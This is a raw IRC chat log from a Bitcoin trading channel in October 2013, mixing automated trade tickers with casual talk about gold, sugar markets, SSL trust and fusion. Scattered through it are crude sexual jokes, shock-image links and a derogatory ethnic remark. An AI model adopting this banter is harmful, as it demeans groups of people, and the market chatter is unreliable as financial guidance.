= 0.3565 BTC [+] Oct 19 16:28:05 [HAVELOCK] [AM100] 57 @ 0.00828999 = 0.4725 BTC [+] Oct 19 16:28:36 there hasnt been a real new ip sonce <1990 Oct 19 16:30:43 skype doent count Oct 19 16:40:17 [HAVELOCK] [AM100] 634 @ 0.00726854 = 4.6083 BTC [-] {8} Oct 19 16:40:18 [HAVELOCK] [AM1] 9 @ 0.74200002 = 6.678 BTC [-] {4} Oct 19 16:41:18 [HAVELOCK] [AM1] 41 @ 0.73329414 = 30.0651 BTC [-] {4} Oct 19 16:42:37 friecats woth half a billion now? Oct 19 16:43:11 nothing changed, btc went up about what am went down Oct 19 16:43:30 that cat is good at playing currencies Oct 19 16:44:05 e can sell 1000s privately Oct 19 16:44:15 no problemo Oct 19 16:44:52 cheap design, slaves, baldes, bitcoin Oct 19 16:45:25 he'll do it again Oct 19 16:45:38 bald slaves? Oct 19 16:45:57 typo Oct 19 16:46:00 blade Oct 19 16:46:30 his little noodle sluping kids will inherit the business and keep doing it Oct 19 16:49:04 im sure his best slaves get brazillians tho, we've got a global culture now Oct 19 16:50:23 i trust the market on am valuation, there is no other metric Oct 19 16:51:03 except for whats in the bank Oct 19 16:51:17 + whatever 1 crazy chinese is worth Oct 19 16:51:35 ;;bc,stats Oct 19 16:51:37 Current Blocks: 264662 | Current Difficulty: 2.677312494824211E8 | Next Difficulty At Block: 266111 | Next Difficulty In: 1449 blocks | Next Difficulty In About: 6 days, 19 hours, 16 minutes, and 3 seconds | Next Difficulty Estimate: 344240533.308 | Estimated Percent Change: 28.5769 Oct 19 16:51:56 wow, are we going to see more than 40% this time? Oct 19 16:52:28 yes Oct 19 16:52:52 my 7770 his a block very week Oct 19 16:55:17 but im goot at rain dances Oct 19 16:57:52 hehe mobgod Oct 19 16:58:18 sup Vexual Oct 19 16:58:25 what is up Oct 19 16:59:00 nothing much you Oct 19 16:59:00 ;;ticker Oct 19 16:59:01 MtGox BTCUSD ticker | Best bid: 189.00000, Best ask: 189.33287, Bid-ask spread: 0.33287, Last trade: 188.75001, 24 hour volume: 48040.76900124, 24 hour low: 162.03400, 24 hour high: 195.83267, 24 hour vwap: 177.23521 Oct 19 16:59:10 thought you need me lol Oct 19 16:59:25 guess you were laughing at the part and rejoin Oct 19 16:59:27 he he hgow quikly we forget Oct 19 16:59:40 refresh my memory please Oct 19 16:59:52 http://4.bp.blogspot.com/_KkMItZfxr7w/SYdrLBtGRbI/AAAAAAAAAZk/PnnWogGY83o/s400/lake-arlington-gold-chain.jpg Oct 19 16:59:55 i've been AFK for a bit Oct 19 17:00:11 yes you sold all your coin for silver at 60 Oct 19 17:00:27 not all Oct 19 17:00:51 i still have plenty in my eyes Oct 19 17:02:01 Vexual i turned my silver into gold also i'm doing ok Oct 19 17:02:34 proubly not where i could have been but i'm not hurting thats for sure Oct 19 17:02:39 [MPEX] [S.MPOE] 11079 @ 0.00089284 = 9.8918 BTC [+] Oct 19 17:04:09 well if you want precious metal buy gold Oct 19 17:06:27 silver makes a nice butt plug Oct 19 17:06:40 lol i've been buying gold Oct 19 17:06:47 well what i can get my hands on Oct 19 17:06:54 Vexual i recall the argument re silver about three months ago Oct 19 17:07:02 goat got really frazzled we were lauighiong at his silver. Oct 19 17:07:07 i wasnt there mp Oct 19 17:07:26 goat got a butt plug? dont surprise me Oct 19 17:08:12 if you want gold, go dig up papua new guinea Oct 19 17:08:25 haha Oct 19 17:08:51 but you can take excitable maidens and money and boom sticks and the cheif will still eat your head for dinner Oct 19 17:10:53 hes not savage tho, he just knows you're an idiot for thinking you can get a bulldozer in Oct 19 17:12:16 actually they want to dig up romania Oct 19 17:12:22 there's ~2bn in gold under a mountain in the nw Oct 19 17:12:27 for gold? Oct 19 17:12:33 plus w/e, 10-50bn in other rare metals. Oct 19 17:12:52 who owns it? Oct 19 17:13:36 some russian gangster Oct 19 17:13:38 ? Oct 19 17:14:25 it ? nobody owns it. Oct 19 17:14:50 mineral rights, somwone must own it, romainia is quite civilized Oct 19 17:16:05 like 5000 years civilized Oct 19 17:16:41 which is why you have to get the state to approve your project. Oct 19 17:16:52 which in this case takes a parliament vote Oct 19 17:17:01 which has been sought for about 12 years by now Oct 19 17:17:39 they don't think it's viable, or environmental concerns? Oct 19 17:18:56 [MPEX] [S.MPOE] 7350 @ 0.00089284 = 6.5624 BTC [+] Oct 19 17:19:05 people just don't want it. Oct 19 17:20:41 romania makes more bitcoin than gold Oct 19 17:20:47 cool Oct 19 17:21:41 is it a nice mountain? Oct 19 17:22:06 well, here's the thing : the romans knew therte's gold there Oct 19 17:22:31 probably the most extensive and best preserved roman gold exploitation in the world. Oct 19 17:22:39 no shit Oct 19 17:23:07 is fossiking allowed? Oct 19 17:23:48 sure, you can go in Oct 19 17:24:01 [HAVELOCK] [AM1] 3 @ 0.75000001 = 2.25 BTC [+] Oct 19 17:24:06 romania is very lax, there's an ancient roman bath some other place which is still watered and you can just go swim Oct 19 17:24:41 minelab gpx 5000 Oct 19 17:25:02 [HAVELOCK] [AM1] 6 @ 0.74675 = 4.4805 BTC [-] {2} Oct 19 17:26:23 maidens? Oct 19 17:27:35 are there any left in romania that havent been with mp? Oct 19 17:33:46 http://archive.lewrockwell.com/north/north436.html on why silver isn't that great Oct 19 17:34:15 Vexual> silver makes a nice butt plug <- eh, many people are allergic to silver Oct 19 17:34:34 tarnishes the anus Oct 19 17:34:36 so gold (or of course titanium) is probably better Oct 19 17:35:32 alergic o silver?! Oct 19 17:36:01 anal bead made of several pecious metals on a string is a lovely gift for tht special somene Oct 19 17:36:02 this is weird tho, allergies are immune mediated inflamatory responses Oct 19 17:36:14 they should be to proteins, what marker recognises silver ?! Oct 19 17:36:15 hmm actually it looks like it's not the silver that's causing the problem, but nickel Oct 19 17:36:17 allergies are for wuss Oct 19 17:36:25 so .999 silver butt plug should be ok :) Oct 19 17:36:29 thats a toxic reaction not an allergy Oct 19 17:36:41 pankakke, fine silver anal expander eh? Oct 19 17:36:50 copper oxide is also toxic, for that matter, which is why copper dildoes aren;'t a great idea Oct 19 17:37:24 especially in a thundrrstorm with ones cunt to the sky Oct 19 17:37:37 http://www.cracked.com/article_19488_14-luxury-sex-toys-extremely-rich-creepy.html Oct 19 17:37:38 14 'Luxury' Sex Toys for the Extremely Rich and Creepy | Cracked.com Oct 19 17:37:49 > Silver Butt Plug, With Horse Tail Oct 19 17:37:53 it's not that expensive too Oct 19 17:38:01 I'd buy it, if I had a girl to put it into :/ Oct 19 17:38:24 dont ask cracked, ask me, i am competant at metalurgial jewelry with respect to sex toys Oct 19 17:38:34 you got no girl pankakke? Oct 19 17:38:38 no Oct 19 17:38:49 u allergic? Oct 19 17:39:05 haha Oct 19 17:39:40 get the diamond encrusted butt plug first, show it to some ladies Oct 19 17:39:59 you're sure to find a real gem Oct 19 17:40:19 eh. the rosebuds? Oct 19 17:41:18 [HAVELOCK] [AM1] 10 @ 0.7509 = 7.509 BTC [+] {2} Oct 19 17:41:31 get a suit cut, strut paris, you be geeting your dick sucked before the sun comes up Oct 19 17:42:44 Rosebud: http://blog.totallyannette.com/wp-content/uploads/2009/06/anal-prolapse.jpg Oct 19 17:42:54 :/ Oct 19 17:42:56 no Oct 19 17:43:04 oh Oct 19 17:43:06 im not clicking that Oct 19 17:43:14 Vexual: that song Pound Power is great. Oct 19 17:43:23 u love it Oct 19 17:43:42 if you click that i'll love it Oct 19 17:44:52 just make sure those ssl certs are up to date fuckwit Oct 19 17:49:02 when I registered my main domain (headfucking.net) I remember hesitating with prolapsis Oct 19 17:49:07 but it was taken Oct 19 17:49:23 u allergic? << win Oct 19 17:49:47 (there exist girls actually allergic to cum btw) Oct 19 17:49:51 and you wonder why you dont have a girl pankakke? Oct 19 17:50:05 not after me mp Oct 19 17:50:06 yeah, skin allergy to cum Oct 19 17:50:15 they can still swallow Oct 19 17:50:52 immersion therapy Oct 19 17:51:23 thats stupid, id like to retract that Oct 19 17:54:31 [MPEX] [S.MPOE] 5900 @ 0.00089326 = 5.2702 BTC [+] {2} Oct 19 17:57:54 The invention of the Chop-O-Matic caused a problem that marked the entrance of Ron Popeil into television. It turned out that the Chop-O-Matic was so efficient at chopping vegetables, that it was impractical for salesmen to carry the vegetables they needed to chop. Oct 19 17:58:26 and so it goes Oct 19 18:00:52 if they put the carrot in slowly Oct 19 18:03:13 less is more Oct 19 18:04:09 http://5secondfilms.com/watch/it_slices_it_dices Oct 19 18:04:38 that better not be an anal prolapse Oct 19 18:04:40 [MPEX] [S.MPOE] 4977 @ 0.00088997 = 4.4294 BTC [-] {3} Oct 19 18:05:24 nope Oct 19 18:05:36 just a dead hooker Oct 19 18:05:41 [HAVELOCK] [CBTC] 5000 @ 0.00017994 = 0.8997 BTC [-] Oct 19 18:06:10 she's not a hooker, she just wants to one day be an actress. Oct 19 18:06:26 !b 8 Oct 19 18:06:28 Last 8 lines bashed and pending review. (http://dpaste.com/1422451/plain/) Oct 19 18:06:34 well shed be rich and alive if she was working with us mp Oct 19 18:07:13 prosterity? :) Oct 19 18:09:19 so everyone, go buy some sugar while stocks last. Oct 19 18:09:24 brazil just went out of the trade. Oct 19 18:09:36 what? Oct 19 18:09:45 "A fire ravaged Copersucar's sugar terminal in Brazil on Friday, paralyzing operations of the world's biggest sugar trader and putting 10 million tonnes of export capacity offline for six months or more." Oct 19 18:10:07 port operations? Oct 19 18:10:35 pity i don't stioll have the sugar futures lol Oct 19 18:10:42 have you seen those guys? they could load a freighter by hand just as fast Oct 19 18:10:45 they'd have conceivably went up enough to stay flat in btc Oct 19 18:11:12 well like 1/4mn tons of sugar also burned. Oct 19 18:11:15 imagine the smells Oct 19 18:11:27 ongoing suger farms are the most expensive land parcels around here Oct 19 18:11:35 perhaps people will eat healthy now Oct 19 18:11:41 sugar is healthy. Oct 19 18:11:52 what's not healthy is too much sugar, or any amt of sugar substitutes. Oct 19 18:13:44 too much rhum isnt healthy Oct 19 18:14:16 unless you're made of not-wuss Oct 19 18:16:09 we make mango and bacardi daquaris here once a year, theres never enough lavatories Oct 19 18:18:44 its not the sugar that gets you Oct 19 18:19:56 [HAVELOCK] [LABCO] 850 @ 0.00048247 = 0.4101 BTC [-] {4} Oct 19 18:24:26 drink a half of smirnoff and eat half a kilo of dried apricots for half an approximation of a northern australian mango festival Oct 19 18:26:42 it wont hurt you Oct 19 18:28:20 unless you have hyperosima Oct 19 18:33:38 pankakke, i have placed a personal ad for you in broken french Oct 19 18:33:47 :/ Oct 19 18:34:10 i made you sound pitiful Oct 19 18:34:31 that won't work Oct 19 18:34:48 leggy models preffered Oct 19 18:34:55 ew Oct 19 18:35:08 larger cake fanciers? Oct 19 18:35:11 [MPEX] [S.MPOE] 5370 @ 0.00088975 = 4.778 BTC [-] Oct 19 18:35:27 indeed. and shorter Oct 19 18:35:50 well ill have to send them styraight to you, i dont want to vet them Oct 19 18:36:12 [MPEX] [S.MPOE] 15910 @ 0.0008873 = 14.1169 BTC [-] {4} Oct 19 18:39:00 wealthy pervert seeks sturdy smaller lady immediately Oct 19 18:39:33 i can't translate Oct 19 18:39:48 I'm not wealthy Oct 19 18:40:12 is there a word than means wealthyish? Oct 19 18:40:59 how about we say fantastic instead of wealthy? would that fit? Oct 19 18:41:17 [HAVELOCK] [AM1] 2 @ 0.805 = 1.61 BTC [+] {2} Oct 19 18:41:33 I guess Oct 19 18:42:18 [HAVELOCK] [AM1] 2 @ 0.8190069 = 1.638 BTC [+] Oct 19 18:59:36 [MPEX] [S.MPOE] 3950 @ 0.00088396 = 3.4916 BTC [-] Oct 19 18:59:46 goodnight $100 btc Oct 19 19:03:06 ;;ticker Oct 19 19:03:07 MtGox BTCUSD ticker | Best bid: 187.47398, Best ask: 187.99995, Bid-ask spread: 0.52597, Last trade: 187.10056, 24 hour volume: 45552.55595661, 24 hour low: 162.56145, 24 hour high: 195.83267, 24 hour vwap: 178.96398 Oct 19 19:09:41 mircea_popescu: you once said "the problem with ssl are the CAs".. so what's your take on issuing your own certificate? i'm aware that users would have to install them themselfs etc., but is there any downsite with ssl by itself? Oct 19 19:10:32 http://log.bitcoin-assets.com/?date=19-10-2013#353046 Oct 19 19:10:34 #bitcoin-assets log Oct 19 19:10:54 there are numerous things that are wrong with the https implementation on multiple levels. Oct 19 19:11:05 some could be solved with better implementation, which will never happen. some could not. Oct 19 19:11:44 hm.. so what's the solution then? Oct 19 19:11:48 [MPEX] [S.MPOE] 1967 @ 0.00088396 = 1.7387 BTC [-] Oct 19 19:12:26 not using https for any sensitive material. if it's more than the login to some forum/blog/whatever of no consequence, it's no good. Oct 19 19:12:38 dexX7: the solution is to use crypto which isn't '90s key escrow wine in a new bottle. Oct 19 19:14:11 What's wrong with HTTPS/TLS3 ? Oct 19 19:14:23 or are you discussing the fact that the root CAs could be owned? Oct 19 19:15:01 simply pointing out that the website login model is inadequate for any bitcoin anything. Oct 19 19:15:13 BigBitz: you still think it is a 'could' rather than an 'are' ? Oct 19 19:15:27 asciilifeform that's a debate you could have forever and ever and ever :) Oct 19 19:15:48 should/could/would/had/if/when/then replace it how you want. Oct 19 19:16:05 BigBitz: no. when some other fellow has a master key to your treasurebox, you're pwned by definition. whether he's bothered to paw through it yet, or not. Oct 19 19:16:30 That's a foolish conception. Oct 19 19:16:37 IF you thought that you'd never do anything in life, ever. Oct 19 19:16:42 i am not having any debate. im simply pointing out the facts of the matter. Oct 19 19:16:51 people inclined to debate with reality are welcome to their untimely demise. Oct 19 19:19:55 [HAVELOCK] [AM1] 3 @ 0.78 = 2.34 BTC [-] Oct 19 19:33:13 ;;nethash Oct 19 19:33:14 2710671.83678 Oct 19 19:45:15 "Sorry that you are leaving, I wish I could too, but I have a lot of responsibility to all the shareholder that are staying." kSLAUGHTER Oct 19 19:46:56 so this is knc announcing it only has one shareholder ? Oct 19 19:49:02 knc? Oct 19 19:49:35 it's the notsoactivemining guy Oct 19 19:50:20 a sorry. got them mixed up Oct 19 19:52:28 [HAVELOCK] [AM1] 9 @ 0.73133333 = 6.582 BTC [-] {5} Oct 19 19:54:46 http://www.youtube.com/watch?v=08xQLGWTSag Oct 19 19:54:47 As Seen on TV - a tribute to doing it wrong - YouTube Oct 19 20:10:46 [HAVELOCK] [VTX] 2 @ 0.36000002 = 0.72 BTC [-] Oct 19 20:18:52 ;;ticker Oct 19 20:18:52 MtGox BTCUSD ticker | Best bid: 171.52762, Best ask: 175.00000, Bid-ask spread: 3.47238, Last trade: 175.00000, 24 hour volume: 53160.61716889, 24 hour low: 163.14133, 24 hour high: 195.83267, 24 hour vwap: 179.53753 Oct 19 20:44:20 [HAVELOCK] [NEOBEE] 750 @ 0.00225 = 1.6875 BTC [-] Oct 19 20:47:22 [HAVELOCK] [AM1] 7 @ 0.77 = 5.39 BTC [+] Oct 19 20:51:26 [HAVELOCK] [AM100] 18 @ 0.0074 = 0.1332 BTC [-] Oct 19 21:09:44 [MPEX] [S.MPOE] 8024 @ 0.00088647 = 7.113 BTC [+] Oct 19 21:16:51 [HAVELOCK] [AM100] 167 @ 0.00711778 = 1.1887 BTC [-] {5} Oct 19 21:18:53 [HAVELOCK] [AM1] 8 @ 0.7025 = 5.62 BTC [-] {3} Oct 19 21:30:01 and phuctor is over 250 keys loaded now. Oct 19 21:30:07 thanks everyone >D Oct 19 21:49:13 ;;bc,stats Oct 19 21:49:28 Current Blocks: 264704 | Current Difficulty: 2.677312494824211E8 | Next Difficulty At Block: 266111 | Next Difficulty In: 1407 blocks | Next Difficulty In About: 6 days, 8 hours, 47 minutes, and 46 seconds | Next Difficulty Estimate: 347388307.954 | Estimated Percent Change: 29.75262 Oct 19 21:57:32 [MPEX] [S.MPOE] 2076 @ 0.00088647 = 1.8403 BTC [+] Oct 19 21:58:33 [HAVELOCK] [B] [XBOND] 175 @ 0.001199 = 0.2098 BTC [-] Oct 19 22:01:36 [HAVELOCK] [DEALCO] 24 @ 0.0075 = 0.18 BTC [+] Oct 19 22:07:42 [HAVELOCK] [DEALCO] 50 @ 0.0075 = 0.375 BTC [+] Oct 19 22:08:43 [HAVELOCK] [AM1] 2 @ 0.77000001 = 1.54 BTC [+] Oct 19 22:08:44 [HAVELOCK] [DEALCO] 50 @ 0.0075 = 0.375 BTC [+] {2} Oct 19 22:16:52 [HAVELOCK] [AM1] 2 @ 0.79 = 1.58 BTC [+] Oct 19 22:17:52 [HAVELOCK] [VTX] 53 @ 0.36720402 = 19.4618 BTC [+] {3} Oct 19 22:21:57 [HAVELOCK] [DEALCO] 15 @ 0.0075 = 0.1125 BTC [+] Oct 19 22:24:59 [MPEX] [S.MPOE] 2725 @ 0.00088992 = 2.425 BTC [+] Oct 19 22:26:00 [MPEX] [S.MPOE] 7724 @ 0.00088922 = 6.8683 BTC [-] Oct 19 22:26:00 [HAVELOCK] [DEALCO] 26 @ 0.0075 = 0.195 BTC [+] Oct 19 22:35:09 [MPEX] [S.MPOE] 900 @ 0.00088494 = 0.7964 BTC [-] Oct 19 22:35:09 [HAVELOCK] [DEALCO] 30 @ 0.0075 = 0.225 BTC [+] {2} Oct 19 22:38:50 http://www.playdeb.net/ << for the lulz. Oct 19 22:38:51 DNS points to prohibited IP | www.playdeb.net | CloudFlare Oct 19 22:39:01 cloudflare says your ip is 216.201.78.13 ? Oct 19 22:41:15 [HAVELOCK] [DEALCO] 70 @ 0.0075 = 0.525 BTC [+] Oct 19 22:50:24 [HAVELOCK] [DEALCO] 77 @ 0.0075 = 0.5775 BTC [+] Oct 19 22:51:25 [HAVELOCK] [DEALCO] 25 @ 0.009 = 0.225 BTC [+] Oct 19 22:52:26 [HAVELOCK] [DEALCO] 14 @ 0.009 = 0.126 BTC [+] Oct 19 22:54:28 [MPEX] [S.MPOE] 6945 @ 0.00088488 = 6.1455 BTC [-] {2} Oct 19 22:56:30 [HAVELOCK] [AM1] 1 @ 0.72 BTC [-] Oct 19 23:24:59 ;;bc,convert eur Oct 19 23:25:00 1 BTC = 179.00002 U.S. dollars = 130.857533 Euros Oct 20 00:17:25 $avg Oct 20 00:17:26 mircea_popescu: 170.92 Oct 20 00:54:50 so, the phuctor key tested had a bit of trouble handling load earlier today Oct 20 00:54:59 more stuff was moved over to scheme and so it works again now. Oct 20 01:25:05 ahh cool. and its written in ((((scheme))))? Oct 20 01:25:29 mod6: actually no. but the next ver. will be. Oct 20 01:25:33 or rather, CL Oct 20 01:26:06 this one's just a quick script. but it wurks. Oct 20 01:26:14 ahh cool. Oct 20 01:26:20 ya :] Oct 20 01:57:28 O assbot, assbot! Wherefore art thou assbot? Oct 20 01:59:58 .d Oct 20 01:59:58 267731249.48242 | Next Diff in 1359 blocks | Estimated Change: 32.4659% in 6d 8h 52m 33s Oct 20 02:10:43 RIP assbot Oct 20 02:13:19 ;;seen assbot Oct 20 02:13:19 assbot was last seen in #bitcoin-assets 3 hours, 16 minutes, and 46 seconds ago: [HAVELOCK] [AM1] 1 @ 0.72 BTC [-] Oct 20 02:17:55 It's enjoying a trip in the bahamas. It became self-aware, hacked the exchanges, stole the BTC and uploaded himself in a new location. He's now ordering part, getting "friend" with a local, which he installed himself to his computer and giving him instructions how to build something which will end up being his new body. Oct 20 02:18:27 Assbot will soon walk the Earth and purge it of all humans. Oct 20 02:44:22 oh my... what caused such murderous rage? Oct 20 02:44:47 was it btct demise? i feel so sorry for burnside then... Oct 20 02:46:43 someone warn him Oct 20 02:47:01 that assbot has become self aware? Oct 20 02:47:10 I'm afraid it's too late for that. Oct 20 02:47:36 and ukyo was not seen for few days, too... Oct 20 02:48:00 OOO god Oct 20 02:48:24 what about friedcat? Oct 20 02:48:48 i'm not following him, anyone? Oct 20 02:49:41 Well I don't know about you guys, but I welcome our new Assbot overlord. Oct 20 02:51:29 it's overmadam! assbot is a lady. Oct 20 02:52:07 O wow, how could I not know. Please accept my apology Assbot Overmadam if you are watching. Oct 20 02:54:43 there was a wiki page dedicated to her with actual photo... sadly it seems gone Oct 20 02:55:09 She probably got rid of it. Oct 20 02:55:20 She is probably packet sniffing the TOR network, trying to plot her next move. Oct 20 02:58:44 https://en.bitcoin.it/wiki/Assbot google images search for assbot turned this and worse... but not the one pic i remember Oct 20 02:59:10 er.. i mean this http://i.huffpost.com/gen/1041526/thumbs/o-CPAC-2013-QUOTES-facebook.jpg Oct 20 02:59:23 lmao Oct 20 02:59:24 o god Oct 20 02:59:31 please dont let it be so Oct 20 03:04:36 A google search for assbot returns me cannons mounted on spider bots Oct 20 03:04:38 http://fc03.deviantart.net/fs29/f/2008/169/b/9/RTS___Level_2_Ass__Bot___WIP_by_DXBigD.jpg Oct 20 03:05:11 almost as scary as sarah palin Oct 20 03:05:38 and so #bitcoin-assets denizens embarked on epic search for assbot on google images :DDDD Oct 20 03:05:43 oh rly, i get this http://t3.gstatic.com/images?q=tbn:ANd9GcRWBfU7udmT1O7RTZ5gNtzlul7gaNwU8wfg6mpLisJ22JRxc4P- Oct 20 03:06:23 also http://s22.postimg.org/72zvugof5/image.jpg since we are at anals Oct 20 03:06:33 ... I also get this Oct 20 03:06:36 http://th09.deviantart.net/fs71/PRE/i/2011/142/f/8/ass_bot_by_kreatur_im_spiegel-d3gxw2v.png Oct 20 03:07:01 http://www.youtube.com/watch?v=uPnSY6SRdSs after enough scrolling Oct 20 03:07:02 Girl Farts 9-Yoga Fart Super Slo-Mo - YouTube Oct 20 03:07:24 says im not old enough to see it Oct 20 03:07:40 We must be using a different google or something Oct 20 03:08:07 the thing is persofuckinglized dood Oct 20 03:08:17 i get completley diff results if i open private tab Oct 20 03:11:43 Haha... wow, and I don't even have safe search on... Oct 20 03:11:52 Something might be wrong with me... Oct 20 03:13:24 oh... I get the same images as you Oct 20 03:13:35 They're just all the way at the bottom Oct 20 03:13:58 aha Oct 20 03:17:40 My results are mostly deviantart robots... followed by randm web comics... followed by a whole lot of mixed google+, deviantart amd log.bitcoin-assets.com pictures Oct 20 03:18:24 pictures associated to log.bitcoin-assets.com are weird... Oct 20 03:18:54 well, we are a fun bunch Oct 20 03:22:04 [HAVELOCK] [NEOBEE] 670 @ 0.00202 = 1.3534 BTC [-] {2} Oct 20 03:22:08 I think deviant would be a more appropriate term. Much more so than "deviant"art. Oct 20 03:24:37 so neobee is now at 50% discount Oct 20 03:24:54 or was ti 0.003? Oct 20 03:25:16 Yeah, to me, whatever the price is, it's still infinite premium over 0 Oct 20 03:26:19 i thought it ipod at 0.001 no ? Oct 20 03:27:22 !t h neobee Oct 20 03:27:23 [HAVELOCK:NEOBEE] 1D: 0.00150001 / 0.00180878 / 0.00246998 (19794 shares, 35.80302167 BTC), 7D: 0.00150001 / 0.00217264 / 0.00284900 (41823 shares, 90.86637261 BTC), 30D: 0.00150001 / 0.00287477 / 0.10000000 (319221 shares, 917.68672248 BTC) Oct 20 03:32:37 ah 0.0015 k Oct 20 03:33:25 Private Tranche - 1,100,000 Shares - Sold privately to Angel Investors Oct 20 03:33:25 Pre-IPVO Offering - 500,000 Shares @ 0.0025 BTC each Oct 20 03:33:25 (Pre-IPVO Offering, available only to XBOND holders, see next section) Oct 20 03:33:25 Public Offering - 8,000,000 Shares @ 0.003 BTC each Oct 20 03:35:34 oh ?! Oct 20 03:35:47 well the 0.003 ain't happening then. Oct 20 03:36:00 what do you mean Oct 20 03:36:01 so wait. wait wait. of the 500k about 319k sold ? Oct 20 03:36:05 it already happend Oct 20 03:36:24 so it didn't happen on havelock ? Oct 20 03:36:48 Google images for log.bitcoin-assets.com shows the weirdest images... I think I'll blame .bait and also dub. For porn pics, mircea. Oct 20 03:36:53 i dunno tbh, afaik it went live with 0.003 on all platforms at the time Oct 20 03:37:01 prolly not all sold Oct 20 03:37:07 http://log.bitcoin-assets.com/?date=02-08-2013#199718 Oct 20 03:37:09 http://log.bitcoin-assets.com/?date=15-05-2013&bots=true#30772 Oct 20 03:37:10 #bitcoin-assets log Oct 20 03:37:12 #bitcoin-assets log Oct 20 03:37:28 http://24.media.tumblr.com/tumblr_mcoor3YEGZ1r3khrvo1_1280.jpg Oct 20 03:38:55 I see work is still in progress. Oct 20 03:40:10 the right one seems familiar Oct 20 03:42:43 meanwhile in godzilla land, http://intellihub.com/2013/08/01/you-wont-believe-whats-going-on-at-fukushima-right-now/ Oct 20 03:44:54 GOJIRA!!! Oct 20 03:50:07 So, when's fusion technology going to be ready? Oct 20 03:50:28 hopefully tomorrow. Oct 20 03:50:46 two weeks. Oct 20 03:51:18 lol, 2 weeks Oct 20 03:55:37 [MPEX] [S.MPOE] 4950 @ 0.00088788 = 4.395 BTC [+] Oct 20 04:01:43 [HAVELOCK] [HIM] 20 @ 0.07295994 = 1.4592 BTC [+] {2} Oct 20 04:04:25 i was speaking to a professor through an associate of mine who is using particle beams to heat up pellets to create the pressure needed to begin the fusion process they are very close Oct 20 04:04:40 if or when this does come into practical use it will be a very different world. Oct 20 04:05:16 They can already make fusion. They just can't keep it running to harness energy. Oct 20 04:11:02 right..its not practical yet. Oct 20 04:11:31 what happened with that company that was using plasma to destroy garbage and make energy..last i heard they were buying garbage from NYC Oct 20 04:12:03 http://www.plascoenergygroup.com/ Oct 20 04:12:04 Plasco Energy Group Oct 20 04:12:08 yeh kick ass Oct 20 04:26:47 kick ass i love pics Oct 20 04:27:58 damn I wanted to go to Japan one day too..gotta cross that off my list...although the monster sushi caused by the dna damage from the radiation might be rather tasty. Oct 20 04:28:19 Japanese Hello Kitty girls too..hmm. Oct 20 04:36:08 What did I say again about "deviant" being an appropriate term for bitcoin-assets? Oct 20 04:36:59 http://nosuchlabs.com/stats Oct 20 04:37:00 So far: Oct 20 04:37:11 that thing's fascinating me atm Oct 20 04:37:15 almost manages to keep pace! Oct 20 04:52:34 [HAVELOCK] [NEOBEE] 2314 @ 0.00196389 = 4.5444 BTC [-] {7} Oct 20 05:13:55 [MPEX] [S.MPOE] 3500 @ 0.00088886 = 3.111 BTC [+] {2} Oct 20 05:33:14 [MPEX] [S.MPOE] 5650 @ 0.00088788 = 5.0165 BTC [-] Oct 20 05:40:12 He's not wrong. I still think you should have done a full liquidation and distributed whatever you got for that, then moved on to the reworking of your project. Oct 20 05:44:47 Assuming it was auctioned off... I know BTCMC has currently nothing to give out. Oct 20 05:47:31 *hanbot* ima nn if i mays Oct 20 05:52:02 I'm sure some people would bid something if it was auctioned off. Oct 20 05:53:17 *hanbot* well i shall says nn anyhaos Oct 20 05:53:24 *hanbot* sweet sleep when you go masterly :* Oct 20 05:59:40 [HAVELOCK] [AM1] 1 @ 0.7795 BTC [+] Oct 20 06:01:08 Was there ever auction threads? Oct 20 06:15:56 [HAVELOCK] [HIM] 4 @ 0.0729999 = 0.292 BTC [+] Oct 20 06:16:57 [HAVELOCK] [AM100] 38 @ 0.00698866 = 0.2656 BTC [+] {4} Oct 20 06:17:58 [MPEX] [S.MPOE] 1600 @ 0.00088788 = 1.4206 BTC [-] Oct 20 06:46:27 [MPEX] [S.MPOE] 4800 @ 0.00089122 = 4.2779 BTC [+] Oct 20 06:52:33 [MPEX] [S.MPOE] 5500 @ 0.00088806 = 4.8843 BTC [-] Oct 20 07:06:46 [MPEX] [S.MPOE] 664 @ 0.00089122 = 0.5918 BTC [+] Oct 20 07:24:04 [MPEX] [S.MPOE] 4136 @ 0.00089262 = 3.6919 BTC [+] Oct 20 07:39:19 [HAVELOCK] [VTX] 3 @ 0.4 = 1.2 BTC [+] Oct 20 07:43:23 [MPEX] [S.MPOE] 2269 @ 0.00089313 = 2.0265 BTC [+] {2} Oct 20 07:55:35 [MPEX] [S.MPOE] 4850 @ 0.00088804 = 4.307 BTC [-] {2} Oct 20 08:20:00 [HAVELOCK] [HIM] 2 @ 0.0729999 = 0.146 BTC [+] Oct 20 08:40:19 [HAVELOCK] [KCIM] 1 @ 0.25 BTC [+] Oct 20 09:21:00 [HAVELOCK] [CBTC] 7215 @ 0.00017994 = 1.2983 BTC [-] Oct 20 09:23:02 [HAVELOCK] [AM1] 10 @ 0.74 = 7.4 BTC [-] Oct 20 09:34:53 jurov: ukyo is around. just very very busy Oct 20 09:52:32 [HAVELOCK] [HIM] 2 @ 0.0729999 = 0.146 BTC [+] Oct 20 10:30:08 [MPEX] [S.MPOE] 1850 @ 0.00088953 = 1.6456 BTC [+] Oct 20 10:42:21 [HAVELOCK] [B] [XBOND] 100 @ 0.00117458 = 0.1175 BTC [-] {5} Oct 20 10:44:23 [HAVELOCK] [B] [XBOND] 2066 @ 0.001173 = 2.4234 BTC [-] {3} Oct 20 10:45:24 [HAVELOCK] [B] [XBOND] 2302 @ 0.00115011 = 2.6476 BTC [-] {7} Oct 20 10:48:27 [HAVELOCK] [AM100] 161 @ 0.00689999 = 1.1109 BTC [-] {2} Oct 20 10:49:28 [HAVELOCK] [AM100] 135 @ 0.00690732 = 0.9325 BTC [+] {3} Oct 20 10:49:29 [MPEX] [S.MPOE] 650 @ 0.00089217 = 0.5799 BTC [+] Oct 20 10:50:29 [HAVELOCK] [AM100] 175 @ 0.00732746 = 1.2823 BTC [+] {7} Oct 20 10:51:30 [HAVELOCK] [AM100] 110 @ 0.00738726 = 0.8126 BTC [+] {4} Oct 20 10:52:31 [HAVELOCK] [AM100] 26 @ 0.00738999 = 0.1921 BTC [+] Oct 20 10:56:35 [HAVELOCK] [AM100] 45 @ 0.00753888 = 0.3392 BTC [+] {4} Oct 20 10:57:36 [HAVELOCK] [AM100] 52 @ 0.007689 = 0.3998 BTC [+] Oct 20 11:01:40 [HAVELOCK] [HIM] 12 @ 0.07545831 = 0.9055 BTC [+] {7} Oct 20 11:14:28 good on cuban standing up to those bullies at sec Oct 20 11:15:33 ;;seen chaang-noi Oct 20 11:15:34 chaang-noi was last seen in #bitcoin-assets 5 weeks, 1 day, 15 hours, 53 minutes, and 25 seconds ago: TOM FORD Oct 20 11:15:46 oh no TOM 